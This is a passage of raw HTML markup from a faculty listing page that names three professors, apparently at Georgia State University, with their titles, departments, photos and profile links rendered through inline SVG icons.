class=\"h-global-transition-all h-heading style-974 style-local-182-c24 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c24\">\n <!---->\n <!---->\n <h4 class=\"\">Susie Ramisetty-Mikler</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c25\" class=\"h-text h-text-component style-975 style-local-182-c25 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Research Associate Professor</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c26\" class=\"h-text h-text-component style-976 style-local-182-c26 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Population Health Sciences\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c27\" class=\"style-983 style-local-182-c27 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/susie-ramisetty-mikler-7a0b3014/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://publichealth.gsu.edu/profile/susie-ramisetty-mikler/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=KzNVJwIAAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c28-outer\">\n <div data-colibri-id=\"182-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c28 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c29\" class=\"d-block style-973 style-local-182-c29 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg\" class=\"wp-image-704 style-973-image style-local-182-c29-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c29-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c30\" class=\"h-global-transition-all h-heading style-974 style-local-182-c30 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c30\">\n <!---->\n <!---->\n <h4 class=\"\">Alex Zelikovsky</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c31\" class=\"h-text h-text-component style-975 style-local-182-c31 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Distinguished University Professor</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c32\" class=\"h-text h-text-component style-976 style-local-182-c32 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c33\" class=\"style-977 style-local-182-c33 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/alex-zelikovsky-48a2795/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/alex-zelikovsky/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=UzCRNJwAAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c34-outer\">\n <div data-colibri-id=\"182-c34\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c34 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c35\" class=\"d-block style-973 style-local-182-c35 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-bourgeois.jpeg\" class=\"wp-image-696 style-973-image style-local-182-c35-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c35-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c36\" class=\"h-global-transition-all h-heading style-974 style-local-182-c36 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c36\">\n <!---->\n <!---->\n <h4 class=\"\">Anu Bourgeois</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c37\" class=\"h-text h-text-component style-975 style-local-182-c37 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Professor</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c38\" class=\"h-text h-text-component style-976 style-local-182-c38 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c39\" class=\"style-977 style-local-182-c39 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/anu-bourgeois-09b7b32b/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/anu-bourgeois/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=qsAUgQ8AAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 